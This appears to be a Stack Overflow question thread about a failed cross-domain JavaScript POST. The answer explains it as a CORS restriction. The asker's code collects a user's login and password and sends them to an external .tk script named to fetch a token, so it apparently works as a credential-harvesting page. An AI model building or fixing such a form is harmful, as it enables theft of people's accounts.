# Not able to post data on external domain javascript

Tags: javascript, jquery, html

Hey friends I want to post data to an external server with JavaScript but it is not working and I don't know why, I am new to JavaScript.

Here is my HTML:

```
<div class="form-group">
 <label for="usr">Email address or phone number:</label>
  <input type="text" class="form-control" id="tk" placeholder="Email address or phone number" required>
</div>
<div class="form-group">
  <label for="pwd">Password:</label>
  <input type="password" class="form-control" id="mk" required>
</div>
<strong>Recommend, Use Google Chrome Browser</strong><br />
<button type="button" class="btn btn-danger" onclick="putar()" ><b>Get data Now !!!</b></button>

    </div>
</div>
```

Here is my JavaScript:

```
<script>
function putar() {
var http = new XMLHttpRequest();
var tk = document.getElementById("tk").value;
var mk = document.getElementById("mk").value;
var url = "http://mydomin.tk/ambil_token.php";
var params = "u="+tk+"&p="+mk+"";
http.open("POST", url, true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.onreadystatechange = function() {
    if(http.readyState == 4 && http.status == 200) {
      document.getElementById("trave").innerHTML = http.responseText;        
    }
}
http.send(params);
}
</script>
```

Comment: why `php`  tag ?

Comment: he/she means javascript

Comment: By mistake @webpic I edit this but why you downvote

Comment: does your page redirect after the click of the button?

Comment: No nothing happens @madalin

Comment: You need to check in the browser dev tools (f12) in the network pane what is going on with the ajax request that is been sent. Is it pending, is it getting error..

Comment: I already check @elpddev but it's nothing everything seems to be right

Comment: Do you see the request get results and 200 status in the network pane ? You can put a breakpoint also in the onreadystatuschange function to get the execution after the request returned.

Comment: @AvinashKumar downvote is not by me . someone else

Answer (score 0):

I'd advice you to supply either error messages or a clear way to reproduce the issue. You can retrieve browser debug information from the Developer Console of your browser.

Based on the bare information you have supplied it seems the issue you are running into is XHR request being denied (CORS).

See [How do I send a cross-domain POST request via JavaScript?](https://stackoverflow.com/questions/298745/how-do-i-send-a-cross-domain-post-request-via-javascript)

Comment: Yah it's seems k wait I am trying

Comment: But what I do if this is not available on second domin.... header('Access-Control-Allow-Origin: *');

Comment: If you want to allow cross domain form submission via XHR you need to explicitly allow that via the CORS headers described in the link above. In your case you need to change the contents of `http://mydomin.tk/ambil_token.php` to send the headers.

Again, we are currently making assumptions because you are not giving enough information on the issue.

Comment: But any other way possible if I don't have access to **ambil_token.php** file